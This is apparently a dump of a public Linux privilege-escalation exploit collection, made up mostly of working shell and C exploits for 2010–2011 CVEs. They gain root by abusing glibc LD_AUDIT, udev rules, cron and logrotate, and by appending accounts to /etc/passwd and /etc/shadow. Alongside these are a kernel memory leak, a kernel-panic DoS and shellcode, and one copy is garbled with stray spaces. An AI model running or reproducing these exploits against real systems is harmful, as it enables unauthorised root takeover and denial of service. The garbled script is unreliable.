echo "[-] Failed to setup SSH key"; exit 1; } 77 | backup ~/.cache || { echo "[-] Failed to backup ~/.cache"; bye; } 78 | own /etc/passwd && echo "$P" >> /etc/passwd 79 | own /etc/shadow && echo "$S" >> /etc/shadow 80 | restore ~/.cache || { echo "[-] Failed to restore ~/.cache"; bye; } 81 | key_remove 82 | echo "[+] Success! Use password toor to get root" 83 | su -c "sed -i '/toor:/d' /etc/{passwd,shadow}; chown root: /etc/{passwd,shadow}; \ 84 | chgrp shadow /etc/shadow; nscd -i passwd >/dev/null 2>&1; bash" toor -------------------------------------------------------------------------------- /2010/CVE-2010-2961.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # by fuzz. For Anux inc. # 3 | # ubuntu 10.04 , 10.10 4 | if [ -z "$1" ] 5 | then 6 | echo "usage: $0 " 7 | echo "see here http://www.reactivated.net/writing_udev_rules.html" 8 | exit 9 | fi 10 | cat > usn985-exploit.sh << EOF 11 | #!/bin/sh 12 | chown root:root $PWD/usn985-sc 13 | chmod +s $PWD/usn985-sc 14 | EOF 15 | cat > usn985-sc.c << EOF 16 | char *s="\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x52\x68\x6e\x2f\x73\x68" 17 | "\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80"; 18 | main(){int *r;*((int *)&r+2)=(int)s;} 19 | EOF 20 | gcc usn985-sc.c -o usn985-sc 21 | echo "KERNEL==\"$1\", RUN+=\"$PWD/usn985-exploit.sh\"" >> /dev/.udev/rules.d/root.rules 22 | chmod +x usn985-exploit.sh 23 | echo "All set, now wait for udev to restart (reinstall, udev upgrade, SE, raep, threat.)" 24 | echo "Once the conf is reloaded, just make the udev event happen : usn985-sc file will get suid-root" -------------------------------------------------------------------------------- /2010/CVE-2010-3301/15023: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2010/CVE-2010-3301/15023 -------------------------------------------------------------------------------- /2010/CVE-2010-3437/15150: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2010/CVE-2010-3437/15150 -------------------------------------------------------------------------------- /2010/CVE-2010-3847.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | echo wait 3 | cat > a.c << _EOF 4 | void __attribute__((constructor)) init() 5 | { 6 | setuid(0); 7 | system("/bin/bash"); 8 | } 9 | _EOF 10 | mkdir /tmp/lenis 11 | ln /bin/ping /tmp/lenis/target 12 | exec 3< /tmp/lenis/target 13 | rm -rf /tmp/lenis/ 14 | gcc -w -fPIC -shared -o /tmp/lenis a.c 15 | rm -r a.c 16 | LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3 -------------------------------------------------------------------------------- /2010/CVE-2010-3856/CVE-2010-3856.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | ####################################################### 4 | # I Can't Read and I Won't Race You Either # 5 | # by zx2c4 # 6 | ####################################################### 7 | 8 | ################################################################################ 9 | # This is an exploit for CVE-2010-3856. 10 | # 11 | # A while back, Tavis showed us three ways to exploit flaws in glibc's dynamic 12 | # linker involving LD_AUDIT. [1] [2] 13 | # 14 | # The first way involved opening a file descriptor and using fexecve to easily 15 | # win a race with $ORIGIN. The problem was that this required having read 16 | # permissions on the SUID executables. Tavis recommended a work around involving 17 | # filling a pipe until it was full so that anything written to stderr would 18 | # block. This race, however, was not always successful. The third thing he 19 | # showed us was that LD_AUDIT would load any trusted library, and he pointed out 20 | # that libpcprofile.so could be jiggered to create a world writable root owned 21 | # file in any directory. One candidate would be to write something to a crontab. 22 | # What if, however, you don't have cron installed? He then went on to explain a 23 | # quite extensive search routine to find candidates for libraries to load. 24 | # 25 | # But why search, when you already can make a world writable root owned file in 26 | # any directory you want? The easier way is to use libpcprofile.so to create 27 | # such a file, and then fill that file with code you want to run. Then, run that 28 | # code using the same trick. Pretty simple, and it works. 29 | # 30 | # - zx2c4 31 | # 2011-11-9 32 | # 33 | # greets to taviso. 34 | # 35 | # [1] http://seclists.org/fulldisclosure/2010/Oct/257 36 | # [2] http://seclists.org/bugtraq/2010/Oct/200 37 | ################################################################################ 38 | 39 | echo "[+] Setting umask to 0 so we have world writable files." 40 | umask 0 41 | 42 | echo "[+] Preparing binary payload." 43 | cat > /tmp/payload.c <<_EOF 44 | void __attribute__((constructor)) init() 45 | { 46 | printf("[+] Cleaning up.\n"); 47 | unlink("/lib/libexploit.so"); 48 | 49 | printf("[+] Launching shell.\n"); 50 | setuid(0); 51 | setgid(0); 52 | setenv("HISTFILE", "/dev/null", 1); 53 | execl("/bin/sh", "/bin/sh", "-i", 0); 54 | } 55 | _EOF 56 | gcc -w -fPIC -shared -o /tmp/exploit /tmp/payload.c 57 | 58 | echo "[+] Writing root owned world readable file in /lib" 59 | LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/lib/libexploit.so" ping 2>/dev/null 60 | 61 | echo "[+] Filling the lib file with lib contents." 62 | cat /tmp/exploit > /lib/libexploit.so 63 | rm /tmp/payload.c /tmp/exploit 64 | 65 | echo "[+] Executing payload." 66 | LD_AUDIT="libexploit.so" ping 67 | -------------------------------------------------------------------------------- /2010/CVE-2010-3856/DSO_libmemusage.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # 3 | # [+] Glibc <= 2.12.x, 2.11.3, 2.12.2 LD_AUDIT libmemusage.so local root exploit 4 | # 5 | # Edited by Todor Donev (todor dot donev at gmail dot com) 6 | # This is another exploit for CVE-2010-3856 7 | # 8 | # Thanks to Tavis 'taviso' Ormandy, zx2c4, Marco 'raptor' Ivaldi, Stiliyan Angelov 9 | # and Tsvetelina Emirska 10 | # 11 | # Another exploits: 12 | # http://www.0xdeadbeef.info/exploits/raptor_ldaudit 13 | # http://www.0xdeadbeef.info/exploits/raptor_ldaudit2 14 | # http://www.exploit-db.com/exploits/18105/ 15 | # http://seclists.org/fulldisclosure/2010/Oct/257 16 | # http://seclists.org/bugtraq/2010/Oct/200 17 | # 18 | echo "[+] Setting umask to 0 so we have world writable files." 19 | umask 0 20 | echo "[+] Preparing binary payload.." 21 | cat > /tmp/payload.c <<_EOF 22 | void __attribute__((constructor)) init() 23 | { 24 | unlink("/lib/sploit.so"); 25 | setuid(0); 26 | setgid(0); 27 | setenv("HISTFILE", "/dev/null", 1); 28 | execl("/bin/sh", "/bin/sh", "-i", 0); 29 | } 30 | _EOF 31 | gcc -w -fPIC -shared -o /tmp/exploit /tmp/payload.c 32 | echo "[+] Writing root owned world readable file in /lib" 33 | LD_AUDIT="libmemusage.so" MEMUSAGE_OUTPUT="/lib/sploit.so" ping 2>/dev/null 34 | echo "[+] Filling the lib file with lib contents." 35 | cat /tmp/exploit > /lib/sploit.so 36 | rm /tmp/payload.c /tmp/exploit 37 | echo "[+] Executing payload.." 38 | LD_AUDIT="sploit.so" ping 39 | -------------------------------------------------------------------------------- /2010/CVE-2010-3856/glibc_libmemusage.so.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # CVE-2010-3856 3 | 4 | OUTPUT=/etc/ld.so.preload 5 | 6 | MASK=`umask` 7 | umask 0 8 | LD_AUDIT="libmemusage.so" MEMUSAGE_OUTPUT="$OUTPUT" ping 2> /dev/null 9 | if [ ! -f $OUTPUT ]; then 10 | echo "System does not appear to be vulnerable" 11 | exit 0 12 | fi 13 | echo -n > $OUTPUT 14 | umask $MASK 15 | 16 | cat > exec.c << EOF 17 | #include 18 | #include 19 | main(int argc, char *argv[]) 20 | { 21 | if(argc == 2) { 22 | setgid(0); setuid(0); 23 | system(argv[1]); } 24 | return 0; 25 | } 26 | EOF 27 | gcc exec.c -o exec 28 | 29 | cat > sh.c << EOF 30 | #include 31 | #include 32 | #include 33 | int main () 34 | { 35 | setuid(geteuid()); 36 | setgid(getegid()); 37 | execl("/bin/sh", "bin/sh","-c", "cp ./exec ./exec2; chown root ./exec2; chgrp root ./exec2; chmod 755 ./exec2; chmod +s ./exec2;", NULL); 38 | return 0; 39 | } 40 | EOF 41 | gcc sh.c -o sh 42 | 43 | cat > libpwn.c << EOF 44 | #include 45 | #include 46 | uid_t getuid (void) 47 | { 48 | chown("$PWD/sh", 0, 0); 49 | chmod("$PWD/sh", S_ISUID|S_IRUSR|S_IWUSR|S_IXUSR|S_IRGRP|S_IXGRP|S_IROTH|S_IXOTH); 50 | return 0; 51 | } 52 | EOF 53 | gcc -Wall -fPIC -c libpwn.c 54 | gcc -shared -Wl,-soname,libpwn.so -o libpwn.so libpwn.o 55 | 56 | echo "$PWD/libpwn.so" > $OUTPUT 57 | ping 2> /dev/null 58 | echo -n > $OUTPUT 59 | ./sh 60 | -------------------------------------------------------------------------------- /2010/CVE-2010-3856/glibc_libpcprofile.so.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # CVE-2010-3856 3 | # Author: deadbyte 4 | 5 | OUTPUT=/etc/ld.so.preload 6 | 7 | MASK=`umask` 8 | umask 0 9 | LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="$OUTPUT" ping 2> /dev/null 10 | if [ ! -f $OUTPUT ]; then 11 | echo "System does not appear to be vulnerable" 12 | exit 0 13 | fi 14 | echo -n > $OUTPUT 15 | umask $MASK 16 | 17 | cat > sh.c << EOF 18 | #include 19 | #include 20 | int main (int argc, char **argv, char **envp) 21 | { 22 | char *args[] = { "/bin/bash", NULL }; 23 | setuid(geteuid()); 24 | setgid(getegid()); 25 | execve(args[0], args, envp); 26 | perror("execve failed"); 27 | return 0; 28 | } 29 | EOF 30 | gcc sh.c -o sh 31 | 32 | cat > libpwn.c << EOF 33 | #include 34 | #include 35 | uid_t getuid (void) 36 | { 37 | chown("$PWD/sh", 0, 0); 38 | chmod("$PWD/sh", S_ISUID|S_IRUSR|S_IWUSR|S_IXUSR|S_IRGRP|S_IXGRP|S_IROTH|S_IXOTH); 39 | return 0; 40 | } 41 | EOF 42 | gcc -Wall -fPIC -c libpwn.c 43 | gcc -shared -Wl,-soname,libpwn.so -o libpwn.so libpwn.o 44 | 45 | echo "$PWD/libpwn.so" > $OUTPUT 46 | ping 2> /dev/null 47 | echo -n > $OUTPUT 48 | ./sh 49 | -------------------------------------------------------------------------------- /2010/CVE-2010-3856/glibc_nondebian.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | cat > sh.c << EOF 3 | #include 4 | #include 5 | main(int argc, char *argv[]) 6 | { 7 | if(argc == 2) { 8 | setgid(0); setuid(0); 9 | system(argv[1]); } 10 | return 0; 11 | } 12 | EOF 13 | gcc sh.c -o sh 14 | cat > payload.c << EOF 15 | void __attribute__((constructor)) init() 16 | { 17 | setgid(0); 18 | setuid(0); 19 | system("chown root:root sh; chmod 4755 sh"); 20 | } 21 | EOF 22 | gcc -w -fPIC -shared -o exploit2 payload.c 23 | PWDEXP=. 24 | mkdir $PWDEXP/exploit 25 | ln /bin/ping $PWDEXP/exploit/target 26 | exec 3< $PWDEXP/exploit/target 27 | rm -rf $PWDEXP/exploit 28 | cp exploit2 exploit 29 | chmod 0755 exploit 30 | LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3 31 | -------------------------------------------------------------------------------- /2010/CVE-2010-3856/libmemusage.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # CVE-2010-3856 3 | # Author: deadbyte 4 | 5 | OUTPUT=/etc/ld.so.preload 6 | 7 | MASK=`umask` 8 | umask 0 9 | LD_AUDIT="libmemusage.so" MEMUSAGE_OUTPUT="$OUTPUT" ping 2> /dev/null 10 | if [ ! -f $OUTPUT ]; then 11 | echo "System does not appear to be vulnerable" 12 | exit 0 13 | fi 14 | echo -n > $OUTPUT 15 | umask $MASK 16 | 17 | cat > exec.c << EOF 18 | #include 19 | #include 20 | main(int argc, char *argv[]) 21 | { 22 | if(argc == 2) { 23 | setgid(0); setuid(0); 24 | system(argv[1]); } 25 | return 0; 26 | } 27 | EOF 28 | gcc exec.c -o exec 29 | 30 | cat > sh.c << EOF 31 | #include 32 | #include 33 | #include 34 | int main () 35 | { 36 | setuid(geteuid()); 37 | setgid(getegid()); 38 | execl("/bin/sh", "bin/sh","-c", "cp ./exec ./exec2; chown root ./exec2; chgrp root ./exec2; chmod 755 ./exec2; chmod +s ./exec2;", NULL); 39 | return 0; 40 | } 41 | EOF 42 | gcc sh.c -o sh 43 | 44 | cat > libpwn.c << EOF 45 | #include 46 | #include 47 | uid_t getuid (void) 48 | { 49 | chown("$PWD/sh", 0, 0); 50 | chmod("$PWD/sh", S_ISUID|S_IRUSR|S_IWUSR|S_IXUSR|S_IRGRP|S_IXGRP|S_IROTH|S_IXOTH); 51 | return 0; 52 | } 53 | EOF 54 | gcc -Wall -fPIC -c libpwn.c 55 | gcc -shared -Wl,-soname,libpwn.so -o libpwn.so libpwn.o 56 | 57 | echo "$PWD/libpwn.so" > $OUTPUT 58 | ping 2> /dev/null 59 | echo -n > $OUTPUT 60 | ./sh 61 | -------------------------------------------------------------------------------- /2010/CVE-2010-3856/libpcprofile.sh: -------------------------------------------------------------------------------- 1 | #! / Bin / bash 2 | # CVE-2010-3856 3 | # Author: deadbyte 4 | 5 | OUTPUT = / etc / ld.so.preload 6 | 7 | MASK = `umask` 8 | umask 0 9 | LD_AUDIT = "libpcprofile.so" PCPROFILE_OUTPUT = "$ OUTPUT" ping 2> / dev / null 10 | if [! -F $ OUTPUT]; then 11 | echo "System does not appear to be vulnerable" 12 | exit 0 13 | fi 14 | echo-n> $ OUTPUT 15 | umask $ MASK 16 | 17 | cat> sh.c << EOF 18 | # Include 19 | # Include 20 | int main (int argc, char ** argv, char ** envp) 21 | { 22 | char * args [] = {"/ bin / bash", NULL}; 23 | setuid (geteuid ()); 24 | setgid (getegid ()); 25 | execve (args [0], args, envp); 26 | perror ("execve failed"); 27 | return 0; 28 | } 29 | EOF 30 | gcc sh.c-o sh 31 | 32 | cat> libpwn.c << EOF 33 | # Include 34 | # Include 35 | uid_t getuid (void) 36 | { 37 | chown ("$ PWD / sh", 0, 0); 38 | chmod ("$ PWD / sh", S_ISUID | S_IRUSR | S_IWUSR | S_IXUSR | S_IRGRP | S_IXGRP | S_IROTH | S_IXOTH); 39 | return 0; 40 | } 41 | EOF 42 | gcc-Wall-fPIC-c libpwn.c 43 | gcc-shared-Wl,-soname, libpwn.so-o libpwn.so libpwn.o 44 | 45 | echo "$ PWD / libpwn.so"> $ OUTPUT 46 | ping 2> / dev / null 47 | echo-n> $ OUTPUT 48 | . / Sh -------------------------------------------------------------------------------- /2010/CVE-2010-3856/raptor_ldaudit.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | # 4 | # $Id: raptor_ldaudit2,v 1.2 2011/02/04 11:05:15 raptor Exp $ 5 | # 6 | # raptor_ldaudit2 - another glibc ld.so exploit (logrotate) 7 | # Copyright (c) 2010 Marco Ivaldi 8 | # 9 | # Property of @ Mediaservice.net Srl Data Security Division 10 | # http://www.mediaservice.net/ http://lab.mediaservice.net/ 11 | # 12 | # ld.so in the GNU C Library (aka glibc or libc6) before 2.11.3, and 2.12.x 13 | # before 2.12.2, does not properly restrict use of the LD_AUDIT environment 14 | # variable to reference dynamic shared objects (DSOs) as audit objects, which 15 | # allows local users to gain privileges by leveraging an unsafe DSO located in 16 | # a trusted library directory, as demonstrated by libpcprofile.so 17 | # (CVE-2010-3856). 18 | # 19 | # "Suit up. Score chicks. Be awesome." -- Barney Stinson 20 | # 21 | # This vulnerability has been disclosed by Tavis Ormandy (with thanks to Ben 22 | # Hawkes and Julien Tinnes): http://seclists.org/fulldisclosure/2010/Oct/344 23 | # 24 | # This exploit uses the logrotate attack vector. See also the cron.d version 25 | # available at: http://www.0xdeadbeef.info/exploit/raptor_ldaudit 26 | # 27 | # Usage: 28 | # $ chmod +x raptor_ldaudit2 29 | # $ ./raptor_ldaudit2 30 | # [...] 31 | # Everything looks fine. 32 | # Just wait until logrotate is run and check /tmp/pwned. 33 | # [...] 34 | # $ /tmp/pwned 35 | # sh-4.1# id 36 | # uid=0(root) gid=0(root) groups=0(root),100(users) 37 | # sh-4.1# 38 | # [don't forget to delete /tmp/pwned* and /var/log/runme*!] 39 | # 40 | # Vulnerable platforms: 41 | # Slackware 13.1 [tested] 42 | # openSUSE 11.3 [untested] 43 | # Fedora Core 13 [untested] 44 | # RHEL/CentOS 5 [untested] 45 | # Ubuntu 10 [untested] 46 | # [...] 47 | # 48 | 49 | echo "raptor_ldaudit2 - another glibc ld.so exploit (logrotate)" 50 | echo "Copyright (c) 2010 Marco Ivaldi " 51 | echo 52 | 53 | # prepare setuid shell helper to circumvent bash checks 54 | echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > /tmp/pwned.c 55 | gcc -o /tmp/pwned /tmp/pwned.c 56 | if [ $? -ne 0 ]; then 57 | echo "Error: Problems compiling setuid shell helper, check your gcc." 58 | exit 1 59 | fi 60 | 61 | # create a fake log file in /var/log 62 | LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/var/log/runme" ping 2>/dev/null 63 | 64 | # do the magic! 65 | runme="/etc/logrotate.d/runme" 66 | umask 0 67 | LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="$runme" ping 2>/dev/null 68 | if [ "`cat $runme 2>/dev/null`" = "" ]; then 69 | echo "Error: Not vulnerable or wrong attack vector? See comments." 70 | exit 1 71 | fi 72 | 73 | # build the logrotate script 74 | echo "/var/log/runme {" > $runme 75 | echo "daily" >> $runme 76 | echo "size=0" >> $runme 77 | echo "firstaction" >> $runme 78 | echo "chown root /tmp/pwned;chmod 4755 /tmp/pwned;rm -f $runme" >> $runme 79 | echo "endscript" >> $runme 80 | echo "}" >> $runme 81 | 82 | # legen -- wait for it -- dary! 83 | echo "Everything looks fine." 84 | echo "Just wait until logrotate is run and check /tmp/pwned." 85 | -------------------------------------------------------------------------------- /2010/CVE-2010-3856/raptor_ldaudit2.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | # 4 | # $Id: raptor_ldaudit,v 1.2 2011/02/04 11:05:15 raptor Exp $ 5 | # 6 | # raptor_ldaudit - privilege escalation through glibc ld.so 7 | # Copyright (c) 2010 Marco Ivaldi 8 | # 9 | # Property of @ Mediaservice.net Srl Data Security Division 10 | # http://www.mediaservice.net/ http://lab.mediaservice.net/ 11 | # 12 | # ld.so in the GNU C Library (aka glibc or libc6) before 2.11.3, and 2.12.x 13 | # before 2.12.2, does not properly restrict use of the LD_AUDIT environment 14 | # variable to reference dynamic shared objects (DSOs) as audit objects, which 15 | # allows local users to gain privileges by leveraging an unsafe DSO located in 16 | # a trusted library directory, as demonstrated by libpcprofile.so 17 | # (CVE-2010-3856). 18 | # 19 | # "Suit up. Score chicks. Be awesome." -- Barney Stinson 20 | # 21 | # This vulnerability has been disclosed by Tavis Ormandy (with thanks to Ben 22 | # Hawkes and Julien Tinnes): http://seclists.org/fulldisclosure/2010/Oct/344 23 | # 24 | # Other possible attack vectors: /etc/cron.{hourly,daily,weekly,monthly}, at 25 | # (/var/spool/atjobs/), xinetd (/etc/xinetd.d), /etc/logrotate.d and more... 26 | # 27 | # Usage: 28 | # $ chmod +x raptor_ldaudit 29 | # $ ./raptor_ldaudit 30 | # [...] 31 | # Everything looks fine. Just wait for it... LEGEN-DARY! 32 | # -rwsr-xr-x 1 root users 5707 2010-11-11 14:48 /tmp/pwned 33 | # sh-4.1# id 34 | # uid=0(root) gid=0(root) groups=0(root),100(users) 35 | # sh-4.1# 36 | # [don't forget to delete /tmp/pwned*!] 37 | # 38 | # Vulnerable platforms: 39 | # Slackware 13.1 [tested, weird loop in dillon's cron but it works] 40 | # openSUSE 11.3 [untested] 41 | # Fedora Core 13 [untested] 42 | # RHEL/CentOS 5 [untested] 43 | # Ubuntu 10 [untested] 44 | # [...] 45 | # 46 | 47 | echo "raptor_ldaudit - privilege escalation through glibc ld.so" 48 | echo "Copyright (c) 2010 Marco Ivaldi " 49 | echo 50 | 51 | # prepare setuid shell helper to circumvent bash checks 52 | echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > /tmp/pwned.c 53 | gcc -o /tmp/pwned /tmp/pwned.c 54 | if [ $? -ne 0 ]; then 55 | echo "Error: Problems compiling setuid shell helper, check your gcc." 56 | exit 1 57 | fi 58 | 59 | # do the magic! 60 | runme="/etc/cron.d/runme" 61 | umask 0 62 | LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="$runme" ping 2>/dev/null 63 | if [ "`cat $runme 2>/dev/null`" = "" ]; then 64 | echo "Error: Not vulnerable or wrong attack vector? See comments." 65 | exit 1 66 | fi 67 | 68 | # build the cron script (vixie's crontab) 69 | echo -n > $runme 70 | echo "* * * * * root chown root /tmp/pwned; chmod 4755 /tmp/pwned; rm -f $runme" >> $runme 71 | # build the cron script (dillon's crontab) 72 | echo "* * * * * chown root /tmp/pwned; chmod 4755 /tmp/pwned; rm -f $runme" >> $runme 73 | 74 | # legen -- wait for it -- dary! 75 | echo -n "Everything looks fine. Just wait for it... " 76 | sleep 70 77 | echo "LEGEN-DARY!" 78 | ls -l /tmp/pwned 79 | /tmp/pwned 80 | -------------------------------------------------------------------------------- /2010/CVE-2010-3904/15285: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2010/CVE-2010-3904/15285 -------------------------------------------------------------------------------- /2010/CVE-2010-3904/linux-rds-exploit: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2010/CVE-2010-3904/linux-rds-exploit -------------------------------------------------------------------------------- /2010/CVE-2010-4077, 2.6.37/CVE-2010-4077.c: -------------------------------------------------------------------------------- 1 | /* Linux <= 2.6.37-rc1 serial_core TIOCGICOUNT leak 2 | * ================================================ 3 | * Information leak exploit for CVE-2010-4077 which 4 | * leaks kernel stack space back to userland due to 5 | * uninitialized struct member "reserved" in struct 6 | * serial_icounter_struct copied to userland. uses 7 | * ioctl to trigger memory leak, dumps to file and 8 | * displays to command line. 9 | * 10 | * -- prdelka 11 | * 12 | */ 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | 21 | int main(int argc, char* argv[]) { 22 | int fd, ret = 0, i; 23 | struct serial_icounter_struct buffer; 24 | printf("[ Linux <= 2.6.37-rc1 serial_core TIOCGICOUNT leak exploit\n"); 25 | if(argc < 2){ 26 | printf("[ You need to supply a device name e.g. /dev/ttyS0\n"); 27 | exit(-1); 28 | }; 29 | memset(&buffer,0,sizeof(buffer)); 30 | if((fd = open(argv[1], O_RDONLY)) == -1){ 31 | printf("[ Couldn't open %s\n",argv[1]); 32 | exit(-1); 33 | } 34 | if((ioctl(fd, TIOCGICOUNT, &buffer)) == -1){ 35 | printf("[ Problem with ioctl() request\n"); 36 | exit(-1); 37 | } 38 | close(fd); 39 | for(i=0;i<=9;i++){ 40 | printf("[ int leak[%d]: %x\n",i,buffer.reserved[i]); 41 | }; 42 | if((fd = open("./leak", O_RDWR | O_CREAT, 0640)) == -1){ 43 | printf("[ Can't open file to write memory out\n"); 44 | exit(-1); 45 | } 46 | for(i=0;i<=9;i++){ 47 | ret += write(fd,&buffer.reserved[i],sizeof(int)); 48 | } 49 | close(fd); 50 | printf("[ Written %d leaked bytes to ./leak\n",ret); 51 | exit(0); 52 | } -------------------------------------------------------------------------------- /2010/CVE-2010-4170.sh: -------------------------------------------------------------------------------- 1 | printf "install uprobes /bin/sh" > exploit.conf; MODPROBE_OPTIONS="-C exploit.conf" staprun -u whatever 2 | -------------------------------------------------------------------------------- /2010/CVE-2010-4347/american-sign-language: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2010/CVE-2010-4347/american-sign-language -------------------------------------------------------------------------------- /2010/ia32syscall: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2010/ia32syscall -------------------------------------------------------------------------------- /2011/2.6.18-274/2.6.18-274-2011: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2011/2.6.18-274/2.6.18-274-2011 -------------------------------------------------------------------------------- /2011/2.6.18-6-x86/2.6.18-6-x86-2011: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2011/2.6.18-6-x86/2.6.18-6-x86-2011 -------------------------------------------------------------------------------- /2011/2.6.28/2.6.28-2011: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2011/2.6.28/2.6.28-2011 -------------------------------------------------------------------------------- /2011/2.6.32-46/2-6-32-46-2011: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2011/2.6.32-46/2-6-32-46-2011 -------------------------------------------------------------------------------- /2011/2.6.33/2.6.33-2011: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2011/2.6.33/2.6.33-2011 -------------------------------------------------------------------------------- /2011/2.6.34/2.6.34-2011: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2011/2.6.34/2.6.34-2011 -------------------------------------------------------------------------------- /2011/2.6.34/2.6.34-2011Exploit2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2011/2.6.34/2.6.34-2011Exploit2 -------------------------------------------------------------------------------- /2011/2.6.37-rc2.c: -------------------------------------------------------------------------------- 1 | /* 2 | * TCP_MAXSEG Kernel Panic DoS for Linux < 2.6.37-rc2 3 | * by zx2c4 4 | * 5 | * This exploit triggers CVE-2010-4165, a divide by zero 6 | * error in net/ipv4/tcp.c. Because this is on the softirq 7 | * path, the kernel oopses and then completely dies with 8 | * no chance of recovery. It has been very reliable as a 9 | * DoS, but is not useful for triggering other bugs. 10 | * 11 | * -zx2c4, 28-2-2011 12 | */ 13 | 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | 21 | int main() 22 | { 23 | struct sockaddr_in laddr; 24 | memset(&laddr, 0, sizeof(laddr)); 25 | laddr.sin_family = AF_INET; 26 | laddr.sin_addr.s_addr = inet_addr("127.0.0.1"); 27 | laddr.sin_port = htons(31337); 28 | int listener = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP); 29 | if (listener < 0) { 30 | printf("[-] Could not open listener.\n"); 31 | return -1; 32 | } 33 | int val = 12; 34 | if (setsockopt(listener, IPPROTO_TCP, TCP_MAXSEG, &val, sizeof(val)) < 0) { 35 | printf("[-] Could not set sockopt.\n"); 36 | return -1; 37 | } 38 | if (bind(listener, (struct sockaddr*)&laddr, sizeof(struct sockaddr)) < 0) { 39 | printf("[-] Could not bind to address.\n"); 40 | return -1; 41 | } 42 | if (listen(listener, 1) < 0) { 43 | printf("[-] Could not listen.\n"); 44 | return -1; 45 | } 46 | int hello = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP); 47 | if (hello < 0) { 48 | printf("[-] Could not open connector.\n"); 49 | return -1; 50 | } 51 | if (connect(hello, (struct sockaddr*)&laddr, sizeof(struct sockaddr)) < 0) { 52 | printf("[-] Could not connect to listener.\n"); 53 | return -1; 54 | } 55 | printf("[-] Connection did not trigger oops.\n"); 56 | return 0; 57 | } -------------------------------------------------------------------------------- /2011/6.4-2011: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2011/6.4-2011 -------------------------------------------------------------------------------- /2011/CVE-2011-1485/CVE-2011-1485.sh: -------------------------------------------------------------------------------- 1 | # modified from http://downloads.securityfocus.com/vulnerabilities/exploits/47496.sh 2 | # for rdot.org 3 | cat > suid.c << _EOF 4 | #include 5 | #include 6 | main(int argc, char *argv[]) 7 | { 8 | if(argc == 2) { 9 | setgid(0); setuid(0); 10 | system(argv[1]); } 11 | return 0; 12 | } 13 | _EOF 14 | cat > makesuid.c << _EOF 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | int main(int argc, char **argv) 21 | { 22 | if (fork() != 0) 23 | { 24 | int fd; 25 | char pid_path[15]; 26 | sprintf(pid_path, "/proc/%i", getpid()); 27 | close(0); close(1); close(2); 28 | fd = inotify_init(); 29 | inotify_add_watch(fd, pid_path, IN_ACCESS); 30 | read(fd, NULL, 0); 31 | execl("/usr/bin/passwd", "/usr/bin/passwd", NULL); 32 | } 33 | else 34 | { 35 | execl("/usr/bin/pkexec", "pkexec", argv[1],argv[2],argv[3], NULL); 36 | } 37 | 38 | return 0; 39 | } 40 | 41 | _EOF 42 | gcc -o suid suid.c 